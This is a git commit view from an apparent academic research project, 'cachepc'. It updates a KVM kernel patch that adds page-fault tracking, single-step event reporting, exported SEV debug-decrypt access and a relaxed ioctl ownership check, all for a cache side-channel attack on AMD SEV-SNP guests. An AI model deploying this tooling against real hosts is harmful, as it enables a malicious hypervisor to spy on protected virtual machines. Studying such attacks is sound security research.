cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 23d13c916961d7a1e01dc46d363df82cfb7bb86a
parent 6907b53a850bde2faaa9c2c9342501b775008721
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 15 Nov 2022 14:38:32 +0100

Update kernel source patch

Diffstat:
Mpatch.diff | 193+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------------------
1 file changed, 144 insertions(+), 49 deletions(-)

diff --git a/patch.diff b/patch.diff @@ -17,7 +17,7 @@ index eb186bc57f6a..b96e80934005 100644 /* * The notifier represented by @kvm_page_track_notifier_node is linked into diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile -index 30f244b64523..568cc761f0e5 100644 +index 30f244b64523..c75819a6cd77 100644 --- a/arch/x86/kvm/Makefile +++ b/arch/x86/kvm/Makefile @@ -1,6 +1,6 @@ @@ -36,7 +36,7 @@ index 30f244b64523..568cc761f0e5 100644 - mmu/spte.o + hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \ + cachepc/cachepc.o cachepc/kvm.o \ -+ cachepc/sevstep.o cachepc/uspt.o ++ cachepc/tracking.o cachepc/events.o ifdef CONFIG_HYPERV kvm-y += kvm_onhyperv.o @@ -46,7 +46,7 @@ index 30f244b64523..568cc761f0e5 100644 -kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o +kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o \ -+ svm/avic.o svm/sev.o cachepc/cachepc.o cachepc/uspt.o ++ svm/avic.o svm/sev.o cachepc/cachepc.o cachepc/events.o ifdef CONFIG_HYPERV kvm-amd-y += svm/svm_onhyperv.o @@ -59,7 +59,7 @@ index 000000000000..9119e44af1f0 +/home/louis/kvm-prime-count/cachepc \ No newline at end of file diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c -index d871b8dee7b3..bfeab994420e 100644 +index d871b8dee7b3..317dcb165e92 100644 --- a/arch/x86/kvm/mmu/mmu.c +++ b/arch/x86/kvm/mmu/mmu.c @@ -1152,6 +1152,8 @@ static void drop_large_spte(struct kvm_vcpu *vcpu, u64 *sptep) @@ -93,7 +93,7 @@ index d871b8dee7b3..bfeab994420e 100644 -} +// static bool spte_write_protect(u64 *sptep, bool pt_protect) +// { -+// return sevstep_spte_protect(sptep, pt_protect, KVM_PAGE_TRACK_WRITE); ++// return cachepc_spte_protect(sptep, pt_protect, KVM_PAGE_TRACK_WRITE); +// } static bool rmap_write_protect(struct kvm_rmap_head *rmap_head, @@ -107,7 +107,7 @@ index d871b8dee7b3..bfeab994420e 100644 - flush |= spte_write_protect(sptep, pt_protect); - - return flush; -+ return sevstep_rmap_protect(rmap_head, pt_protect, KVM_PAGE_TRACK_WRITE); ++ return cachepc_rmap_protect(rmap_head, pt_protect, KVM_PAGE_TRACK_WRITE); } static bool spte_clear_dirty(u64 *sptep) @@ -131,7 +131,7 @@ index d871b8dee7b3..bfeab994420e 100644 - kvm_tdp_mmu_write_protect_gfn(kvm, slot, gfn, min_level); - - return write_protected; -+ return sevstep_kvm_mmu_slot_gfn_protect(kvm, slot, ++ return cachepc_kvm_mmu_slot_gfn_protect(kvm, slot, + gfn, min_level, KVM_PAGE_TRACK_WRITE); } @@ -146,7 +146,7 @@ index d871b8dee7b3..bfeab994420e 100644 - if (!fault->present || !fault->write) - return false; -+ sevstep_uspt_page_fault_handle(vcpu, fault); ++ cachepc_uspt_page_fault_handle(vcpu, fault); /* * guest is writing the page which is write tracked which can @@ -169,14 +169,14 @@ index d871b8dee7b3..bfeab994420e 100644 return false; } diff --git a/arch/x86/kvm/mmu/page_track.c b/arch/x86/kvm/mmu/page_track.c -index 2e09d1b6249f..fb17064b5d53 100644 +index 2e09d1b6249f..02821df27f51 100644 --- a/arch/x86/kvm/mmu/page_track.c +++ b/arch/x86/kvm/mmu/page_track.c @@ -19,6 +19,8 @@ #include "mmu.h" #include "mmu_internal.h" -+#include "../cachepc/sevstep.h" ++#include "../cachepc/tracking.h" + bool kvm_page_track_write_tracking_enabled(struct kvm *kvm) { @@ -193,7 +193,7 @@ index 2e09d1b6249f..fb17064b5d53 100644 !kvm_page_track_write_tracking_enabled(kvm))) return; -+ //pr_warn("CachePCTest: Tracking page: %llu\n", gfn); ++ pr_warn("CachePC: Tracking page: %llu\n", gfn); + update_gfn_track(slot, gfn, mode, 1); @@ -205,15 +205,24 @@ index 2e09d1b6249f..fb17064b5d53 100644 - if (mode == KVM_PAGE_TRACK_WRITE) - if (kvm_mmu_slot_gfn_write_protect(kvm, slot, gfn, PG_LEVEL_4K)) - kvm_flush_remote_tlbs(kvm); -+ if (sevstep_kvm_mmu_slot_gfn_protect(kvm, ++ if (cachepc_kvm_mmu_slot_gfn_protect(kvm, + slot, gfn, PG_LEVEL_4K, mode)) { + kvm_flush_remote_tlbs(kvm); + } } EXPORT_SYMBOL_GPL(kvm_slot_page_track_add_page); +@@ -161,6 +165,8 @@ void kvm_slot_page_track_remove_page(struct kvm *kvm, + !kvm_page_track_write_tracking_enabled(kvm))) + return; + ++ pr_warn("CachePC: Untracking page: %llu\n", gfn); ++ + update_gfn_track(slot, gfn, mode, -1); + + /* diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c -index 7b9265d67131..ba7af6bcc33e 100644 +index 7b9265d67131..68b9134970da 100644 --- a/arch/x86/kvm/mmu/tdp_mmu.c +++ b/arch/x86/kvm/mmu/tdp_mmu.c @@ -1810,13 +1810,8 @@ void kvm_tdp_mmu_zap_collapsible_sptes(struct kvm *kvm, @@ -227,18 +236,17 @@ index 7b9265d67131..ba7af6bcc33e 100644 - */ -static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, - gfn_t gfn, int min_level) -+static bool sevstep_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, ++static bool cachepc_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, + gfn_t gfn, int min_level, int mode) { struct tdp_iter iter; u64 new_spte; -@@ -1831,8 +1826,14 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, +@@ -1831,8 +1826,13 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, !is_last_spte(iter.old_spte, iter.level)) continue; - new_spte = iter.old_spte & - ~(PT_WRITABLE_MASK | shadow_mmu_writable_mask); -+ //pr_warn("Sevstep: tdp_protect_gfn\n"); + new_spte = iter.old_spte & ~shadow_mmu_writable_mask; + new_spte &= ~PT_WRITABLE_MASK; + if (mode == KVM_PAGE_TRACK_ACCESS) { @@ -249,11 +257,11 @@ index 7b9265d67131..ba7af6bcc33e 100644 if (new_spte == iter.old_spte) break; -@@ -1846,6 +1847,58 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, +@@ -1846,6 +1846,58 @@ static bool write_protect_gfn(struct kvm *kvm, struct kvm_mmu_page *root, return spte_set; } -+bool sevstep_tdp_protect_gfn(struct kvm *kvm, struct kvm_memory_slot *slot, ++bool cachepc_tdp_protect_gfn(struct kvm *kvm, struct kvm_memory_slot *slot, + gfn_t gfn, int min_level, int mode) +{ + struct kvm_mmu_page *root; @@ -263,11 +271,11 @@ index 7b9265d67131..ba7af6bcc33e 100644 + + lockdep_assert_held_write(&kvm->mmu_lock); + for_each_tdp_mmu_root(kvm, root, slot->as_id) -+ spte_set |= sevstep_protect_gfn(kvm, root, gfn, min_level, mode); ++ spte_set |= cachepc_protect_gfn(kvm, root, gfn, min_level, mode); + + return spte_set; +} -+EXPORT_SYMBOL(sevstep_tdp_protect_gfn); ++EXPORT_SYMBOL(cachepc_tdp_protect_gfn); + +/* + * Removes write access on the last level SPTE mapping this GFN and unsets the @@ -308,31 +316,68 @@ index 7b9265d67131..ba7af6bcc33e 100644 /* * Removes write access on the last level SPTE mapping this GFN and unsets the * MMU-writable bit to ensure future writes continue to be intercepted. -@@ -1855,14 +1908,16 @@ bool kvm_tdp_mmu_write_protect_gfn(struct kvm *kvm, +@@ -1855,14 +1907,17 @@ bool kvm_tdp_mmu_write_protect_gfn(struct kvm *kvm, struct kvm_memory_slot *slot, gfn_t gfn, int min_level) { - struct kvm_mmu_page *root; - bool spte_set = false; -+ return sevstep_tdp_protect_gfn(kvm, slot, gfn, min_level, ++ return cachepc_tdp_protect_gfn(kvm, slot, gfn, min_level, + KVM_PAGE_TRACK_WRITE); -+ // struct kvm_mmu_page *root; -+ // bool spte_set = false; - lockdep_assert_held_write(&kvm->mmu_lock); - for_each_tdp_mmu_root(kvm, root, slot->as_id) - spte_set |= write_protect_gfn(kvm, root, gfn, min_level); ++ // struct kvm_mmu_page *root; ++ // bool spte_set = false; + +- return spte_set; + // lockdep_assert_held_write(&kvm->mmu_lock); + // for_each_tdp_mmu_root(kvm, root, slot->as_id) + // spte_set |= write_protect_gfn(kvm, root, gfn, min_level); - -- return spte_set; ++ + // return spte_set; } /* +diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c +index a4f6d10b0ef3..a1ac048b35cf 100644 +--- a/arch/x86/kvm/svm/sev.c ++++ b/arch/x86/kvm/svm/sev.c +@@ -888,7 +888,7 @@ static int __sev_issue_dbg_cmd(struct kvm *kvm, unsigned long src, + &data, error); + } + +-static int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr, ++int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr, + unsigned long dst_paddr, int sz, int *err) + { + int offset; +@@ -904,6 +904,13 @@ static int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr, + return __sev_issue_dbg_cmd(kvm, src_paddr, dst_paddr, sz, err, false); + } + ++ ++int sev_dbg_decrypt_ext(struct kvm *kvm, unsigned long src_paddr, ++ unsigned long dst_paddr, int sz, int *err) { ++ return __sev_dbg_decrypt(kvm, src_paddr, dst_paddr, sz, err); ++} ++EXPORT_SYMBOL(sev_dbg_decrypt_ext); ++ + static int __sev_dbg_decrypt_user(struct kvm *kvm, unsigned long paddr, + void __user *dst_uaddr, + unsigned long dst_paddr, +@@ -1026,6 +1033,8 @@ static int sev_dbg_crypt(struct kvm *kvm, struct kvm_sev_cmd *argp, bool dec) + unsigned int size; + int ret; + ++ pr_warn("DEBUG CRYPT\n"); ++ + if (!sev_guest(kvm)) + return -ENOTTY; + diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c -index cf0bf456d520..dc6f2e6e52d1 100644 +index cf0bf456d520..4134049e6b08 100644 --- a/arch/x86/kvm/svm/svm.c +++ b/arch/x86/kvm/svm/svm.c @@ -2,6 +2,10 @@ @@ -340,48 +385,76 @@ index cf0bf456d520..dc6f2e6e52d1 100644 #include <linux/kvm_host.h> +#include "cachepc/cachepc.h" -+#include "cachepc/uspt.h" -+#include "cachepc/sevstep.h" ++#include "cachepc/events.h" ++#include "cachepc/tracking.h" + #include "irq.h" #include "mmu.h" #include "kvm_cache_regs.h" -@@ -2083,6 +2087,34 @@ static int smi_interception(struct kvm_vcpu *vcpu) +@@ -2083,6 +2087,38 @@ static int smi_interception(struct kvm_vcpu *vcpu) static int intr_interception(struct kvm_vcpu *vcpu) { -+ if (cachepc_track_single_step && cachepc_single_step) { ++ if (cachepc_track_mode == CPC_TRACK_DATA_ACCESS && cachepc_single_step) { + cachepc_single_step = false; + + if (cachepc_data_fault_avail) { + pr_warn("CachePC: Caught single step WITH data!\n"); + -+ sevstep_uspt_send_and_block( ++ cachepc_send_tracking_event( + cachepc_inst_fault_gfn, cachepc_inst_fault_err, + cachepc_data_fault_gfn, cachepc_data_fault_err); + -+ sevstep_track_single(vcpu, cachepc_data_fault_gfn, ++ cachepc_track_single(vcpu, cachepc_data_fault_gfn, + KVM_PAGE_TRACK_ACCESS); + cachepc_data_fault_avail = false; + -+ sevstep_track_single(vcpu, cachepc_inst_fault_gfn, ++ cachepc_track_single(vcpu, cachepc_inst_fault_gfn, + KVM_PAGE_TRACK_ACCESS); + cachepc_inst_fault_avail = false; + } else if (cachepc_inst_fault_avail) { + pr_warn("CachePC: Caught single step WITHOUT data!\n"); + -+ sevstep_track_single(vcpu, cachepc_inst_fault_gfn, ++ cachepc_send_tracking_event( ++ cachepc_inst_fault_gfn, cachepc_inst_fault_err, ++ 0, 0); ++ ++ cachepc_track_single(vcpu, cachepc_inst_fault_gfn, + KVM_PAGE_TRACK_ACCESS); + cachepc_inst_fault_avail = false; + } else { -+ pr_warn("CachePC: Unexpected single step\n"); ++ pr_err("CachePC: Unexpected single step\n"); + } + } + ++vcpu->stat.irq_exits; return 1; } -@@ -3788,14 +3820,39 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu) +@@ -3269,9 +3305,23 @@ static int svm_handle_invalid_exit(struct kvm_vcpu *vcpu, u64 exit_code) + + int svm_invoke_exit_handler(struct kvm_vcpu *vcpu, u64 exit_code) + { ++ static const struct { ++ u64 code; ++ const char *name; ++ } codelut[] = { ++ SVM_EXIT_REASONS, ++ { -1, NULL } ++ }; ++ size_t i; ++ + if (!svm_check_exit_valid(exit_code)) + return svm_handle_invalid_exit(vcpu, exit_code); + ++ for (i = 0; i < sizeof(codelut) / sizeof(codelut[0]); i++) { ++ if (codelut[i].code == exit_code) ++ pr_warn("KVM EXIT (%s)\n", codelut[i].name); ++ } ++ + #ifdef CONFIG_RETPOLINE + if (exit_code == SVM_EXIT_MSR) + return msr_interception(vcpu); +@@ -3788,14 +3838,39 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu) { struct vcpu_svm *svm = to_svm(vcpu); unsigned long vmcb_pa = svm->current_vmcb->pa; @@ -421,7 +494,7 @@ index cf0bf456d520..dc6f2e6e52d1 100644 /* * Use a single vmcb (vmcb01 because it's always valid) for * context switching guest state via VMLOAD/VMSAVE, that way -@@ -3806,7 +3863,15 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu) +@@ -3806,7 +3881,15 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu) __svm_vcpu_run(vmcb_pa, (unsigned long *)&vcpu->arch.regs); vmsave(svm->vmcb01.pa); @@ -570,7 +643,7 @@ index dfaeb47fcf2a..0626f3fdddfd 100644 2: cli diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c -index d9adf79124f9..3e5c55f9bef0 100644 +index d9adf79124f9..6ca86ab417cb 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -82,6 +82,8 @@ @@ -582,6 +655,14 @@ index d9adf79124f9..3e5c55f9bef0 100644 #define CREATE_TRACE_POINTS #include "trace.h" +@@ -6597,6 +6599,7 @@ long kvm_arch_vm_ioctl(struct file *filp, + if (!kvm_x86_ops.mem_enc_ioctl) + goto out; + ++ pr_warn("ENCRYPT_OP\n"); + r = static_call(kvm_x86_mem_enc_ioctl)(kvm, argp); + break; + } diff --git a/crypto/aes_generic.c b/crypto/aes_generic.c index 27ab27931813..90679ec8ba79 100644 --- a/crypto/aes_generic.c @@ -708,7 +789,7 @@ index e089fbf9017f..7899e1efe852 static int __sev_init_locked(int *error) { diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c -index f2a63cb2658b..4c55f85fc775 100644 +index f2a63cb2658b..c77a29e14771 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c @@ -13,6 +13,7 @@ @@ -719,18 +800,23 @@ index f2a63cb2658b..4c55f85fc775 100644 #include <kvm/iodev.h> #include <linux/kvm_host.h> -@@ -70,6 +71,10 @@ +@@ -64,12 +65,15 @@ + + #define CREATE_TRACE_POINTS + #include <trace/events/kvm.h> ++#include "../../arch/x86/kvm/cachepc/tracking.h" + + #include <linux/kvm_dirty_ring.h> + /* Worst case buffer size needed for holding an integer. */ #define ITOA_MAX_LEN 12 +#include "../../arch/x86/kvm/cachepc/kvm.h" -+#include "../../arch/x86/kvm/cachepc/sevstep.h" -+#include "../../arch/x86/kvm/cachepc/uspt.h" + MODULE_AUTHOR("Qumranet"); MODULE_LICENSE("GPL"); -@@ -1261,6 +1266,9 @@ static void kvm_destroy_vm(struct kvm *kvm) +@@ -1261,6 +1265,9 @@ static void kvm_destroy_vm(struct kvm *kvm) hardware_disable_all(); mmdrop(mm); module_put(kvm_chardev_ops.owner); @@ -740,7 +826,7 @@ index f2a63cb2658b..4c55f85fc775 100644 } void kvm_get_kvm(struct kvm *kvm) -@@ -1360,7 +1368,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, +@@ -1360,7 +1367,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, int idx = slots->node_idx; parent = NULL; @@ -749,7 +835,16 @@ index f2a63cb2658b..4c55f85fc775 100644 struct kvm_memory_slot *tmp; tmp = container_of(*node, struct kvm_memory_slot, gfn_node[idx]); -@@ -4823,6 +4831,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) +@@ -4514,7 +4521,7 @@ static long kvm_vm_ioctl(struct file *filp, + void __user *argp = (void __user *)arg; + int r; + +- if (kvm->mm != current->mm || kvm->vm_dead) ++ if ((ioctl != KVM_MEMORY_ENCRYPT_OP && kvm->mm != current->mm) || kvm->vm_dead) + return -EIO; + switch (ioctl) { + case KVM_CREATE_VCPU: +@@ -4823,6 +4830,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) kvm_uevent_notify_change(KVM_EVENT_CREATE_VM, kvm); fd_install(r, file); @@ -759,7 +854,7 @@ index f2a63cb2658b..4c55f85fc775 100644 return r; put_kvm: -@@ -4864,7 +4875,7 @@ static long kvm_dev_ioctl(struct file *filp, +@@ -4864,7 +4874,7 @@ static long kvm_dev_ioctl(struct file *filp, r = -EOPNOTSUPP; break; default: @@ -768,7 +863,7 @@ index f2a63cb2658b..4c55f85fc775 100644 } out: return r; -@@ -5792,6 +5803,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, +@@ -5792,6 +5802,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, r = kvm_vfio_ops_init(); WARN_ON(r); @@ -777,7 +872,7 @@ index f2a63cb2658b..4c55f85fc775 100644 return 0; out_unreg: -@@ -5821,6 +5834,8 @@ void kvm_exit(void) +@@ -5821,6 +5833,8 @@ void kvm_exit(void) { int cpu;